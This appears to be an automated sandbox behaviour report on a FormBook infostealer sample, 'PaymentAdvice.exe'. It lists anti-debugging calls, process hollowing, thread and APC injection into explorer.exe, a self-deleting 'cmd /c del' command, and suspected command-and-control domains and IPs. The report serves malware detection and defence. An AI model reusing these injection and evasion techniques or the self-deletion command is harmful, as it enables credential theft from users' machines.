          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04643D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04664D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04661DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_047005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04632D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04647E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04668E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04678EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04700EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04634F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04634F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0470070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04648794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04701074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04650050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0464B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04704015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04704015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04654120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0466A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0465C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04708A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0467927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04639240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04674A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04674A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04648A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04635210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04635210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_0463AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04653A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_04662ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.plataformaporelmarcanario.com
          Source: C:\Windows\explorer.exeDomain query: www.unmanglement.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.140.96 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.131 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.hispanicalinguablog.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeDomain query: www.webinast.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.214.93.182 80
          Source: C:\Windows\explorer.exeNetwork Connect: 81.19.159.73 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.142.208.184 80
          Source: C:\Windows\explorer.exeDomain query: www.sgdivergence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.126.101.233 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.21.85.234 80
          Source: C:\Windows\explorer.exeDomain query: www.saturnkorp.net
          Source: C:\Windows\explorer.exeDomain query: www.puebloregentseniorliving.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.abolishlawinforcement.com
          Source: C:\Windows\explorer.exeDomain query: www.dajiangzhibo12.com
          Source: C:\Windows\explorer.exeDomain query: www.brandschutzglas.com
          Source: C:\Windows\explorer.exeDomain query: www.anchor-little.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeCode function: 0_2_73CA1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,GetMessageA,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeSection loaded: unknown target: C:\Users\user\Desktop\PaymentAdvice.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PaymentAdvice.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PaymentAdvice.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\PaymentAdvice.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PaymentAdvice.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: B00000
          Source: C:\Users\user\Desktop\PaymentAdvice.exeProcess created: C:\Users\user\Desktop\PaymentAdvice.exe 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PaymentAdvice.exe'
          Source: explorer.exe, 00000003.00000000.264311845.00000000089FF000.00000004.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000003.00000000.246528467.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000003.00000000.246711523.0000000001640000.00000002.00000001.sdmp, msiexec.exe, 00000007.00000002.501816615.0000000002EB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.237687688.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.492784662.0000000000380000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494092321.00000000007D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.278046129.00000000006E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.PaymentAdvice.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.PaymentAdvice.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PaymentAdvice.exe.2680000.1.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000001.233939392.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.493924242.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277986099.00000000006B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.277857898.0000000000400000.00000040.00000001.sdmp, type: MEMORY
